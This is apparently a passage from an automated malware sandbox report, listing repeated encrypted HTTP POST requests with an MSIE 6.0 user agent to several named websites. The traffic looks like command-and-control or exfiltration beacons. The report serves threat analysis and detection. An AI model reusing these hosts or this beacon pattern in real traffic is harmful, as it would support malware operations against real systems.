36 6f 41 53 69 31 7a 6a 31 76 4f 32 44 31 63 69 5a 71 7a 6c 57 42 32 54 30 4a 33 49 53 5a 5a 56 68 71 63 52 6c 51 38 69 52 44 33 78 4b 6d 6c 39 50 30 6c 57 35 78 4c 53 52 45 6b 6d 61 34 73 31 76 57 6e 62 55 75 4e 64 33 73 5a 49 31 66 43 58 6e 7a 30 49 66 54 53 6a 78 46 45 6b 77 72 62 46 75 6b 50 6e 32 7a 79 63 55 65 54 78 69 75 77 68 48 50 41 71 71 33 79 6c 5a 65 5a 46 46 54 75 48 38 62 43 74 68 38 55 6a 44 4b 59 56 69 35 64 66 70 77 33 6a 6f 51 56 4f 6d 47 49 47 44 72 5a 72 53 38 48 67 38 74 48 59 31 69 49 43 41 33 39 78 33 46 72 33 61 5a 69 79 52 32 53 51 56 69 65 70 39 71 75 49 75 72 70 62 51 70 44 41 6b 37 57 63 53 4d 52 36 47 39 47 52 67 71 75 48 6e 45 31 31 38 31 58 30 74 6f 6a 62 57 6a 46 78 78 6e 55 74 35 4e 55 4e 6e 42 6d 42 39 62 51 6a 35 39 2f 51 66 74 50 51 50 48 32 42 36 63 4a 42 51 69 59 33 7a 77 2f 76 66 51 45 68 33 79 32 6b 34 4d 58 34 30 53 4f 73 31 4d 78 48 6a 75 72 2f 68 4c 31 50 4d 35 70 58 78 2b 49 64 59 73 59 70 6e 63 37 33 58 73 67 39 79 55 5a 72 62 33 74 44 65 6f 44 68 76 4a 6a 2f 58 77 50 79 7a 54 66 65 63 30 44 33 54 52 64 74 4e 6c 54 33 42 77 43 37 4b 65 46 78 66 6a 75 74 45 71 62 69 5a 39 37 76 47 45 49 4c 54 Data Ascii: CXELpcRsv5jRaQhE35Gh4pdkpU/8hFozOG4uN1jqprwQEAymHtrIXMakqXDwu+tK6Uuac/VlWiVDP9SvmPUxwpw4MMGgvg7QVraYjHTzE8Rz0IG/18VffTShzb3BsaHRoCcNRZ+mimeZRwjFqA1/Wf60Q2A6oASi1zj1vO2D1ciZqzlWB2T0J3ISZZVhqcRlQ8iRD3xKml9P0lW5xLSREkma4s1vWnbUuNd3sZI1fCXnz0IfTSjxFEkwrbFukPn2zycUeTxiuwhHPAqq3ylZeZFFTuH8bCth8UjDKYVi5dfpw3joQVOmGIGDrZrS8Hg8tHY1iICA39x3Fr3aZiyR2SQViep9quIurpbQpDAk7WcSMR6G9GRgquHnE1181X0tojbWjFxxnUt5NUNnBmB9bQj59/QftPQPH2B6cJBQiY3zw/vfQEh3y2k4MX40SOs1MxHjur/hL1PM5pXx+IdYsYpnc73Xsg9yUZrb3tDeoDhvJj/XwPyzTfec0D3TRdtNlT3BwC7KeFxfjutEqbiZ97vGEILT
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 572User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.edimart.huCache-Control: no-cacheData Raw: 4b 4b 75 36 30 62 79 41 30 5a 68 45 54 48 49 55 5a 32 53 35 43 6b 2b 33 41 59 46 55 56 47 41 73 73 45 57 6f 75 65 31 55 4e 68 61 72 6f 32 5a 6d 39 5a 78 71 54 46 43 47 53 56 33 6c 62 65 74 42 54 4e 46 44 4e 33 2f 4f 31 45 51 74 75 44 44 69 51 30 41 61 33 64 42 65 63 58 39 73 73 4c 4c 58 6d 73 33 62 42 36 4b 67 4b 4b 56 50 4c 7a 2b 2f 55 74 65 4a 71 51 56 71 42 48 2f 77 4e 63 46 54 6a 4e 74 6c 47 30 33 41 4b 34 63 57 43 4a 64 2f 58 77 75 45 58 34 72 34 53 77 39 41 73 58 6f 57 6e 55 52 6d 47 38 38 4f 58 46 43 64 4e 36 65 4f 79 4d 52 42 53 4a 52 39 59 70 2f 4c 64 75 78 74 74 51 66 47 78 72 2b 7a 73 4c 6d 2f 42 65 30 6c 55 55 34 4c 48 4a 59 4d 44 61 42 64 53 4f 36 75 62 79 66 5a 62 7a 32 75 4d 56 50 53 59 35 73 53 36 74 75 30 44 45 53 67 53 4a 31 6c 7a 79 57 6f 52 57 6e 66 33 57 33 30 75 2b 66 43 66 65 78 58 2f 71 33 46 42 52 6a 46 59 31 4e 65 34 30 2b 4e 56 6f 65 64 78 55 58 44 67 6f 77 6c 6b 37 63 4c 57 55 51 78 42 6f 45 5a 78 4e 7a 34 53 48 43 6d 2f 56 66 4d 38 34 4a 44 50 79 6e 54 34 36 2f 32 6d 51 75 38 55 35 68 6e 74 2b 6f 71 4c 53 55 4f 76 67 4b 4b 30 64 62 67 39 50 78 41 65 5a 59 30 52 58 77 4e 79 4c 43 55 4d 70 4c 4f 41 4b 43 31 6c 73 65 6a 6e 43 4b 6d 57 54 47 33 70 47 6b 69 2f 36 32 76 57 4f 6b 74 79 71 58 4f 54 58 74 71 75 4f 63 47 35 45 77 43 71 56 53 70 30 62 49 71 31 78 6b 66 49 69 30 78 55 6f 62 37 54 4f 5a 66 6e 52 49 32 49 52 63 62 33 32 4a 4d 65 4a 2f 72 56 71 53 2f 73 54 6a 52 4d 32 32 59 73 34 4e 4b 4f 6b 68 50 2b 69 30 70 38 38 56 6d 43 6c 4b 50 6c 42 42 4d 75 66 69 70 4f 39 68 75 32 78 65 67 6a 35 73 51 49 72 41 76 4c 37 52 39 65 57 59 73 4b 79 77 4b 73 43 65 43 39 51 4e 44 76 7a 78 71 4f 75 6e 50 4e 55 4d 6b 32 49 4b 53 64 70 69 53 78 59 52 38 46 49 75 69 35 47 73 3d Data Ascii: KKu60byA0ZhETHIUZ2S5Ck+3AYFUVGAssEWoue1UNharo2Zm9ZxqTFCGSV3lbetBTNFDN3/O1EQtuDDiQ0Aa3dBecX9ssLLXms3bB6KgKKVPLz+/UteJqQVqBH/wNcFTjNtlG03AK4cWCJd/XwuEX4r4Sw9AsXoWnURmG88OXFCdN6eOyMRBSJR9Yp/LduxttQfGxr+zsLm/Be0lUU4LHJYMDaBdSO6ubyfZbz2uMVPSY5sS6tu0DESgSJ1lzyWoRWnf3W30u+fCfexX/q3FBRjFY1Ne40+NVoedxUXDgowlk7cLWUQxBoEZxNz4SHCm/VfM84JDPynT46/2mQu8U5hnt+oqLSUOvgKK0dbg9PxAeZY0RXwNyLCUMpLOAKC1lsejnCKmWTG3pGki/62vWOktyqXOTXtquOcG5EwCqVSp0bIq1xkfIi0xUob7TOZfnRI2IRcb32JMeJ/rVqS/sTjRM22Ys4NKOkhP+i0p88VmClKPlBBMufipO9hu2xegj5sQIrAvL7R9eWYsKywKsCeC9QNDvzxqOunPNUMk2IKSdpiSxYR8FIui5Gs=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 592User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.photo4b.comCache-Control: no-cacheData Raw: 48 6a 42 68 53 46 69 72 33 5a 68 5a 4d 34 2f 6e 57 37 61 4e 44 55 76 6b 65 54 34 67 53 5a 74 33 44 47 79 37 57 6f 59 65 68 63 64 47 66 49 48 42 69 61 41 69 32 71 4d 54 74 43 6c 36 6e 6a 75 35 41 66 73 6b 76 4b 79 59 5a 31 66 43 38 6a 5a 45 32 31 73 53 70 51 45 46 2f 62 58 38 59 2b 4d 75 42 75 42 79 69 69 2f 4c 4c 57 47 37 49 6d 76 41 45 57 68 72 34 6f 68 35 53 6e 63 78 79 42 6e 33 38 37 6c 36 71 62 46 69 51 50 45 78 65 6e 5a 2b 32 6c 61 4f 64 50 50 2f 37 47 35 67 36 42 74 6b 46 34 74 4a 56 7a 44 6e 4d 6f 75 54 35 64 56 67 48 33 48 2f 46 42 31 30 32 47 37 46 43 6d 4a 39 73 33 38 79 4e 62 48 4b 4f 6b 6b 45 73 64 42 57 56 34 34 77 68 42 5a 2f 30 72 70 56 65 45 42 51 64 38 75 6a 34 37 78 30 4f 38 6c 69 4a 62 53 34 57 58 50 37 42 37 6f 63 57 4d 46 35 72 77 64 39 4f 43 2f 35 30 73 5a 75 43 67 2b 45 2b 38 6f 57 30 4e 55 2b 76 58 4f 6b 77 56 55 7a 61 61 54 45 43 65 2f 2b 32 54 4d 71 59 44 32 74 34 46 2f 43 79 39 53 46 62 68 34 5a 75 78 6b 4e 53 79 41 63 54 42 4c 4a 37 55 67 46 72 78 30 4e 57 77 4b 36 44 33 77 6e 49 62 55 70 65 63 2b 6f 32 64 78 4d 54 6f 37 44 64 54 4c 62 4a 75 62 61 44 6e 6c 7a 62 70 45 78 63 71 59 2f 46 68 50 61 46 31 36 41 6a 6a 4a 74 4b 65 59 38 63 31 6c 62 78 44 69 4e 67 73 75 2b 42 68 46 4f 66 6e 6b 5a 4b 35 42 32 49 44 37 63 53 2b 4b 68 53 55 36 37 46 41 50 4c 47 73 78 59 42 35 44 32 4e 73 6c 6c 36 69 42 68 34 4e 4f 47 30 4b 50 36 39 71 76 48 33 74 65 49 6f 58 2b 32 36 33 7a 43 36 52 37 75 6d 30 72 55 32 36 30 4a 38 4b 5a 55 44 2b 67 36 6b 6c 4e 35 4e 48 31 65 2b 4c 35 73 58 41 4a 52 79 71 37 48 4c 58 51 35 65 48 4a 6c 39 76 6a 43 78 49 44 57 4d 71 70 43 6b 76 6e 70 44 63 66 69 4f 57 4c 61 63 33 37 6f 66 34 74 2f 64 7a 4e 47 77 6e 53 33 70 35 59 75 68 6c 37 44 32 66 79 4b 36 4d 32 52 47 37 69 32 4a 77 6e 6e 4d 71 57 6c 4b 6c 38 3d Data Ascii: HjBhSFir3ZhZM4/nW7aNDUvkeT4gSZt3DGy7WoYehcdGfIHBiaAi2qMTtCl6nju5AfskvKyYZ1fC8jZE21sSpQEF/bX8Y+MuBuByii/LLWG7ImvAEWhr4oh5SncxyBn387l6qbFiQPExenZ+2laOdPP/7G5g6BtkF4tJVzDnMouT5dVgH3H/FB102G7FCmJ9s38yNbHKOkkEsdBWV44whBZ/0rpVeEBQd8uj47x0O8liJbS4WXP7B7ocWMF5rwd9OC/50sZuCg+E+8oW0NU+vXOkwVUzaaTECe/+2TMqYD2t4F/Cy9SFbh4ZuxkNSyAcTBLJ7UgFrx0NWwK6D3wnIbUpec+o2dxMTo7DdTLbJubaDnlzbpExcqY/FhPaF16AjjJtKeY8c1lbxDiNgsu+BhFOfnkZK5B2ID7cS+KhSU67FAPLGsxYB5D2Nsll6iBh4NOG0KP69qvH3teIoX+263zC6R7um0rU260J8KZUD+g6klN5NH1e+L5sXAJRyq7HLXQ5eHJl9vjCxIDWMqpCkvnpDcfiOWLac37of4t/dzNGwnS3p5Yuhl7D2fyK6M2RG7i2JwnnMqWlKl8=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 568User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.aevga.comCache-Control: no-cacheData Raw: 4f 77 79 43 30 4a 56 32 30 5a 69 37 68 6e 5a 7a 66 46 62 65 43 49 37 2f 7a 4d 4f 6a 70 64 57 64 6d 56 51 4b 68 56 33 63 32 44 57 43 43 62 67 72 45 5a 4b 68 54 37 76 32 46 4f 37 6d 6e 36 30 77 49 55 61 67 41 44 67 77 45 70 5a 5a 68 68 7a 37 66 66 77 55 71 6a 35 57 32 74 71 57 67 54 72 2b 32 33 51 4d 4d 79 69 44 48 33 66 71 47 4e 47 6d 54 34 4f 67 56 42 74 41 34 46 62 58 6b 4e 52 6f 77 51 6f 35 61 4b 36 49 6c 42 37 50 77 52 2f 74 33 41 54 4b 33 55 37 33 57 32 48 31 47 57 31 36 73 7a 76 57 58 6a 76 36 73 4c 71 65 6a 65 39 33 76 30 68 41 37 72 31 64 52 70 76 41 58 73 5a 41 42 4f 33 59 73 59 42 4f 2b 62 79 62 2f 78 6c 66 49 39 6c 57 4d 64 66 65 6f 36 33 36 4a 70 61 36 67 64 5a 4b 46 33 73 6a 31 70 64 64 7a 68 68 64 73 31 35 67 70 37 73 56 4b 4b 57 42 43 2b 4a 75 4b 35 64 57 36 4e 32 78 2f 30 4f 30 35 78 56 59 54 37 64 73 2b 6c 6a 44 6e 48 6a 34 44 48 2f 6c 66 46 64 67 30 64 37 42 79 41 6a 45 74 2b 58 71 74 37 6c 34 4d 31 31 6f 70 73 35 73 43 54 34 6e 4c 69 54 49 64 38 4a 30 45 7a 6e 54 42 6c 36 6b 4f 39 65 63 4b 70 5a 36 65 6b 47 64 6c 39 73 65 67 6c 32 30 6c 74 48 33 35 51 45 4a 78 42 66 63 6e 55 6c 7a 4c 72 46 76 65 76 4d 46 32 73 5a 78 43 50 2b 71 63 30 70 7a 32 4b 72 49 4c 4b 6e 62 62 4a 72 5a 74 66 37 68 42 58 30 59 4d 43 7a 70 37 59 76 71 61 42 32 54 51 5a 4b 45 62 4f 30 72 39 64 43 43 6f 45 57 72 34 71 67 47 5a 76 56 70 77 55 52 2b 53 67 6a 72 4a 62 2f 35 59 7a 34 4c 70 67 6d 68 46 65 39 68 48 4d 4f 31 32 61 7a 44 51 52 64 45 41 38 34 75 62 35 55 70 65 70 43 75 53 30 71 54 6f 38 7a 36 70 63 79 34 2f 5a 31 64 39 30 2f 6c 7a 58 6c 4f 74 69 65 57 56 43 7a 72 57 75 48 76 45 65 42 36 45 51 46 76 36 6f 4c 76 55 69 67 2f 6c 6c 74 74 74 75 69 36 70 47 6e 48 2b 36 54 63 61 66 77 4b Data Ascii: OwyC0JV20Zi7hnZzfFbeCI7/zMOjpdWdmVQKhV3c2DWCCbgrEZKhT7v2FO7mn60wIUagADgwEpZZhhz7ffwUqj5W2tqWgTr+23QMMyiDH3fqGNGmT4OgVBtA4FbXkNRowQo5aK6IlB7PwR/t3ATK3U73W2H1GW16szvWXjv6sLqeje93v0hA7r1dRpvAXsZABO3YsYBO+byb/xlfI9lWMdfeo636Jpa6gdZKF3sj1pddzhhds15gp7sVKKWBC+JuK5dW6N2x/0O05xVYT7ds+ljDnHj4DH/lfFdg0d7ByAjEt+Xqt7l4M11ops5sCT4nLiTId8J0EznTBl6kO9ecKpZ6ekGdl9segl20ltH35QEJxBfcnUlzLrFvevMF2sZxCP+qc0pz2KrILKnbbJrZtf7hBX0YMCzp7YvqaB2TQZKEbO0r9dCCoEWr4qgGZvVpwUR+SgjrJb/5Yz4LpgmhFe9hHMO12azDQRdEA84ub5UpepCuS0qTo8z6pcy4/Z1d90/lzXlOtieWVCzrWuHvEeB6EQFv6oLvUig/lltttui6pGnH+6TcafwK
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.cokocoko.comCache-Control: no-cacheData Raw: 4b 62 47 6c 31 6d 4a 5a 79 5a 67 65 30 34 4c 6c 31 59 6e 58 38 75 56 67 79 39 76 79 75 47 30 58 74 73 58 2b 6c 59 5a 72 4f 6f 70 7a 45 32 30 73 7a 38 71 59 31 47 77 39 68 43 65 32 6d 79 2b 6e 6d 34 34 4b 61 46 57 6f 75 67 6a 72 4c 6e 2f 6b 36 6a 41 44 74 57 73 4a 77 30 39 30 4c 44 79 32 71 47 61 47 36 48 49 74 63 41 52 57 31 48 38 58 68 76 41 47 4b 4f 5a 4d 34 59 39 34 57 4a 4b 72 64 38 43 31 72 4b 76 52 4f 44 59 4b 77 78 69 74 35 35 43 74 6c 47 61 68 66 58 6d 6c 36 4b 63 79 6d 42 38 4f 66 63 58 4d 4c 4e 52 67 6b 47 67 65 6a 2f 7a 46 70 2b 77 66 72 49 48 37 4d 50 74 7a 6b 74 6e 4e 62 77 71 34 36 38 31 46 62 71 57 33 2f 2b 44 4e 32 45 37 53 6d 42 43 56 76 37 34 47 56 54 48 46 4f 57 4f 77 54 58 45 41 51 45 45 2b 67 45 63 5a 77 6e 6a 72 4a 47 6d 75 48 72 62 53 45 34 4b 4e 76 46 79 5a 4d 7a 73 56 52 56 4c 53 71 62 56 6e 39 38 6c 57 35 56 57 57 4c 77 31 34 6f 65 49 6b 33 35 38 6c 53 4a 49 45 47 46 61 57 55 51 32 51 54 61 57 47 50 69 5a 49 6d 57 48 4c 52 75 73 45 78 75 4e 70 44 6f 63 65 44 4e 65 68 4e 6c 4f 4a 74 33 32 47 32 4a 7a 62 65 56 5a 33 44 4f 4c 58 77 4d 34 4c 39 6b 52 51 79 75 4c 73 4c 45 35 72 50 36 34 57 69 49 39 77 6e 67 31 49 45 58 65 54 77 72 41 33 6b 76 75 39 44 67 6e 6f 46 74 2f 6f 2f 30 36 6d 56 5a 38 2f 72 33 63 5a 55 68 4b 44 66 31 51 44 44 5a 49 75 77 4d 74 49 42 66 6d 62 75 4d 69 48 74 6f 36 43 33 30 50 51 56 64 34 72 6c 35 46 7a 4e 76 36 34 68 66 53 31 35 56 45 65 49 34 66 56 4b 62 4b 53 72 6a 37 4d 63 42 78 74 6d 39 66 79 38 57 46 30 58 70 6c 39 6d 4e 37 46 50 58 37 6f 71 4f 72 32 6f 68 53 4a 54 42 41 55 72 39 65 51 57 47 65 2f 43 6c 38 2b 5a 54 75 33 6f 4a 6e 69 42 64 34 73 74 53 69 36 5a 41 3d 3d Data Ascii: KbGl1mJZyZge04Ll1YnX8uVgy9vyuG0XtsX+lYZrOopzE20sz8qY1Gw9hCe2my+nm44KaFWougjrLn/k6jADtWsJw090LDy2qGaG6HItcARW1H8XhvAGKOZM4Y94WJKrd8C1rKvRODYKwxit55CtlGahfXml6KcymB8OfcXMLNRgkGgej/zFp+wfrIH7MPtzktnNbwq4681FbqW3/+DN2E7SmBCVv74GVTHFOWOwTXEAQEE+gEcZwnjrJGmuHrbSE4KNvFyZMzsVRVLSqbVn98lW5VWWLw14oeIk358lSJIEGFaWUQ2QTaWGPiZImWHLRusExuNpDoceDNehNlOJt32G2JzbeVZ3DOLXwM4L9kRQyuLsLE5rP64WiI9wng1IEXeTwrA3kvu9DgnoFt/o/06mVZ8/r3cZUhKDf1QDDZIuwMtIBfmbuMiHto6C30PQVd4rl5FzNv64hfS15VEeI4fVKbKSrj7McBxtm9fy8WF0Xpl9mN7FPX7oqOr2ohSJTBAUr9eQWGe/Cl8+ZTu3oJniBd4stSi6ZA==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.jacomfg.comCache-Control: no-cacheData Raw: 4b 6c 43 56 47 44 68 75 35 4a 69 4e 67 70 52 2f 75 39 78 71 78 79 73 4f 2b 58 47 41 4a 51 64 78 37 4f 78 49 64 4c 54 30 75 62 63 35 4d 67 77 41 4d 31 63 59 67 66 43 53 59 6d 6a 57 78 51 4b 33 43 66 74 64 4e 32 76 71 56 58 67 6d 6d 6b 68 34 77 79 55 32 6c 63 76 44 69 45 34 72 72 41 30 4d 6c 4a 4d 69 52 32 4b 44 48 36 36 62 64 4e 6a 73 39 5a 34 57 4f 56 4b 4b 62 42 47 4e 56 6e 4c 38 63 2b 57 35 45 37 42 73 71 77 50 61 55 4e 45 32 34 6d 52 31 50 45 5a 47 55 4c 41 54 5a 2f 73 66 30 71 69 53 4c 67 6f 4e 66 66 78 32 68 38 4c 6d 65 34 56 53 77 58 43 36 47 35 56 61 6f 46 38 43 4a 36 31 31 35 35 68 42 76 63 6f 2f 51 6a 74 56 2b 73 5a 75 33 41 36 4c 2f 44 2f 4d 39 57 31 63 74 69 47 52 61 48 61 6c 49 39 47 67 75 52 68 4f 78 6c 57 51 4b 50 37 64 58 49 4e 78 50 51 77 46 47 36 4c 36 70 36 71 41 47 47 59 30 6f 37 52 66 6f 36 57 71 64 6c 4f 6d 41 62 58 5a 56 70 54 41 57 5a 70 70 5a 59 53 48 72 47 32 75 78 59 62 32 76 46 31 74 49 78 70 57 50 37 68 6a 63 74 36 63 55 62 63 55 37 67 67 54 6f 2b 4d 58 69 65 70 75 66 56 34 41 49 48 4e 56 56 38 45 56 45 38 72 70 2f 4b 4e 78 39 56 74 72 75 58 72 59 38 58 78 2b 32 74 4a 51 64 67 67 6f 2b 4f 64 45 4f 54 64 57 31 4f 57 67 36 4c 4a 56 57 53 78 79 6f 57 70 4e 76 72 4f 39 50 68 65 51 4b 38 33 75 6a 78 50 68 65 38 58 75 68 7a 70 30 52 6d 39 6d 72 41 57 52 6b 43 68 4c 70 48 53 4d 32 63 65 6f 43 76 68 46 5a 59 76 5a 2b 75 6b 74 36 45 6c 2f 30 47 68 76 4d 49 46 56 59 78 39 7a 67 55 41 34 64 66 4e 4b 77 54 4f 4a 44 61 4c 58 31 45 36 4c 51 59 34 4d 6a 77 67 4d 6d 38 37 61 78 32 78 59 76 67 36 48 47 47 6f 6b 37 33 55 50 56 51 6a 35 65 47 32 34 76 53 75 72 4d 30 72 79 74 31 68 34 45 70 77 46 59 32 4c 43 35 35 52 4c 36 70 71 76 44 74 47 39 49 78 4c 31 41 58 79 70 41 75 56 73 4d 58 4b 73 76 6d 33 2f 76 35 4b 44 46 74 33 6e Data Ascii: KlCVGDhu5JiNgpR/u9xqxysO+XGAJQdx7OxIdLT0ubc5MgwAM1cYgfCSYmjWxQK3CftdN2vqVXgmmkh4wyU2lcvDiE4rrA0MlJMiR2KDH66bdNjs9Z4WOVKKbBGNVnL8c+W5E7BsqwPaUNE24mR1PEZGULATZ/sf0qiSLgoNffx2h8Lme4VSwXC6G5VaoF8CJ61155hBvco/QjtV+sZu3A6L/D/M9W1ctiGRaHalI9GguRhOxlWQKP7dXINxPQwFG6L6p6qAGGY0o7Rfo6WqdlOmAbXZVpTAWZppZYSHrG2uxYb2vF1tIxpWP7hjct6cUbcU7ggTo+MXiepufV4AIHNVV8EVE8rp/KNx9VtruXrY8Xx+2tJQdggo+OdEOTdW1OWg6LJVWSxyoWpNvrO9PheQK83ujxPhe8Xuhzp0Rm9mrAWRkChLpHSM2ceoCvhFZYvZ+ukt6El/0GhvMIFVYx9zgUA4dfNKwTOJDaLX1E6LQY4MjwgMm87ax2xYvg6HGGok73UPVQj5eG24vSurM0ryt1h4EpwFY2LC55RL6pqvDtG9IxL1AXypAuVsMXKsvm3/v5KDFt3n
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 568User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.pcgrate.comCache-Control: no-cacheData Raw: 73 53 73 51 34 65 37 77 36 70 69 6f 49 69 36 43 2b 51 4f 61 49 31 47 38 44 72 39 75 46 64 4a 6c 41 69 6a 77 68 64 2f 54 70 74 49 35 68 6c 36 53 73 6f 38 43 57 57 76 57 64 47 39 36 41 76 76 6d 30 6d 72 4e 71 75 79 76 53 36 68 45 45 58 42 75 57 48 70 57 48 4d 7a 76 50 49 2b 48 4c 2f 46 64 30 54 30 5a 2b 47 61 68 55 4c 46 31 74 52 36 71 79 68 47 52 36 36 46 67 61 65 41 54 56 47 50 64 66 45 36 63 47 34 37 67 42 67 6b 72 68 6b 45 54 58 48 49 41 5a 45 2f 2f 6a 49 34 51 79 48 65 67 61 38 72 79 77 35 44 70 2f 72 48 34 44 57 71 47 65 4a 67 4a 30 4f 70 36 4d 39 52 42 56 78 61 50 65 4d 43 72 2b 62 37 36 4d 51 49 37 39 6d 4a 77 4e 47 47 58 6f 31 6e 49 30 71 6a 6f 2b 62 62 4e 36 46 6f 6e 61 63 77 6d 46 69 75 2b 71 72 32 69 56 70 33 52 62 42 6c 54 4d 61 68 4d 48 62 6a 2b 4c 4d 41 6a 43 70 44 42 42 71 4b 45 63 66 45 2b 30 73 34 50 64 57 63 45 4c 63 61 44 70 62 71 32 7a 50 41 36 49 51 39 31 59 54 6f 38 6c 69 54 62 58 57 30 46 65 2b 42 76 75 74 77 4b 4e 35 43 6a 6c 39 6b 35 4a 74 2b 44 6f 65 7a 59 6e 36 42 35 73 6e 69 76 76 64 41 41 49 65 37 6f 35 67 6a 47 2f 50 30 58 4c 2b 64 6e 37 7a 46 52 2b 4e 42 48 6f 73 6d 49 52 50 61 75 70 6e 39 49 73 61 35 61 66 71 72 4b 54 63 7a 32 7a 31 73 4c 54 30 73 66 4a 6c 50 36 71 45 32 78 33 69 4c 68 2f 65 46 4b 50 61 54 34 79 54 4c 62 66 6a 43 52 6c 6a 6a 30 6f 56 35 6f 79 7a 31 79 53 45 30 4d 2f 71 53 44 30 38 57 46 51 38 79 4b 49 76 58 74 47 36 31 4a 55 71 50 56 35 41 68 39 76 68 7a 4c 55 73 76 41 50 55 6a 7a 78 52 36 6a 47 55 6b 72 4c 59 47 52 34 62 41 31 59 73 6b 2b 2f 67 62 47 70 59 36 41 62 4d 42 47 7a 41 4c 4c 47 51 5a 34 53 70 4d 42 78 49 51 4a 56 77 4f 38 4b 50 4d 65 73 35 32 53 43 68 2f 53 61 6a 37 4d 63 6f 58 78 4b 52 66 65 77 34 4a 65 6d 49 5a 67 Data Ascii: sSsQ4e7w6pioIi6C+QOaI1G8Dr9uFdJlAijwhd/TptI5hl6Sso8CWWvWdG96Avvm0mrNquyvS6hEEXBuWHpWHMzvPI+HL/Fd0T0Z+GahULF1tR6qyhGR66FgaeATVGPdfE6cG47gBgkrhkETXHIAZE//jI4QyHega8ryw5Dp/rH4DWqGeJgJ0Op6M9RBVxaPeMCr+b76MQI79mJwNGGXo1nI0qjo+bbN6FonacwmFiu+qr2iVp3RbBlTMahMHbj+LMAjCpDBBqKEcfE+0s4PdWcELcaDpbq2zPA6IQ91YTo8liTbXW0Fe+BvutwKN5Cjl9k5Jt+DoezYn6B5snivvdAAIe7o5gjG/P0XL+dn7zFR+NBHosmIRPaupn9Isa5afqrKTcz2z1sLT0sfJlP6qE2x3iLh/eFKPaT4yTLbfjCRljj0oV5oyz1ySE0M/qSD08WFQ8yKIvXtG61JUqPV5Ah9vhzLUsvAPUjzxR6jGUkrLYGR4bA1Ysk+/gbGpY6AbMBGzALLGQZ4SpMBxIQJVwO8KPMes52SCh/Saj7McoXxKRfew4JemIZg
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.crcsi.orgCache-Control: no-cacheData Raw: 53 37 71 70 35 6e 77 66 36 35 68 62 4d 45 6d 39 4a 2f 51 47 77 67 2b 41 2b 4d 41 55 53 6a 33 41 63 4b 67 72 72 37 37 4c 6f 7a 6d 68 37 76 43 4e 35 65 61 68 6f 4e 41 61 43 51 75 69 38 76 4c 52 72 49 77 6a 67 48 5a 30 74 4f 6e 4c 6d 32 43 53 44 49 37 6d 58 37 34 42 7a 33 56 4e 71 2f 53 42 51 47 39 45 35 75 64 68 41 63 42 72 65 5a 4e 53 68 70 54 4c 6b 63 36 62 54 68 48 55 31 35 2b 73 74 4f 39 6d 30 65 31 37 46 6d 6f 76 68 69 70 50 59 6e 4c 6e 73 31 78 52 46 4c 6d 73 64 63 48 78 4b 4f 2f 74 66 34 49 51 70 37 41 65 64 33 36 56 50 67 30 6c 56 52 67 77 6b 72 69 67 4d 4f 75 6f 4d 6b 66 79 59 4a 78 31 63 56 35 30 36 4f 51 63 2f 70 62 34 4f 7a 6b 70 75 55 45 55 4e 65 6f 6f 4c 4e 78 54 77 46 72 63 4e 45 69 74 50 53 5a 48 78 62 6b 7a 4c 34 75 6d 49 30 6f 70 79 37 42 61 64 66 51 48 50 6e 41 68 33 61 6e 58 42 56 4a 35 45 35 62 33 4f 49 77 76 62 6d 50 69 57 67 38 4d 58 74 50 4b 52 67 2b 71 35 46 6a 68 48 43 79 41 48 75 66 35 79 4d 70 48 6e 43 37 43 58 4a 43 2f 46 6f 55 61 6b 32 4c 33 75 34 65 4f 6c 68 45 45 6c 4b 4c 51 4a 49 67 64 4d 39 6c 4b 4c 6e 49 58 30 39 71 69 77 7a 68 65 2b 64 39 77 61 54 43 6f 39 4f 51 59 62 2f 49 32 46 2f 4e 48 51 66 79 62 51 44 53 33 37 37 36 75 76 58 37 4f 66 53 50 5a 78 66 6e 31 33 47 68 65 41 69 69 31 38 69 78 56 4c 31 57 31 33 58 6b 56 56 7a 67 31 66 4f 61 54 71 59 50 42 45 6f 39 35 33 5a 61 6e 68 33 42 4b 63 73 37 46 64 6f 52 6e 42 62 2f 5a 6d 63 6b 32 49 79 66 43 4f 4d 7a 5a 53 4e 4a 59 4c 78 53 76 7a 6b 59 35 33 7a 35 5a 42 44 6a 52 51 6c 6d 41 36 66 63 6e 64 77 34 4f 39 6a 5a 71 74 49 37 6e 70 4e 44 52 32 66 49 32 44 70 47 52 2b 76 50 65 73 43 54 34 76 57 43 4f 74 74 66 4a 70 4a 70 4a 48 51 3d 3d Data Ascii: 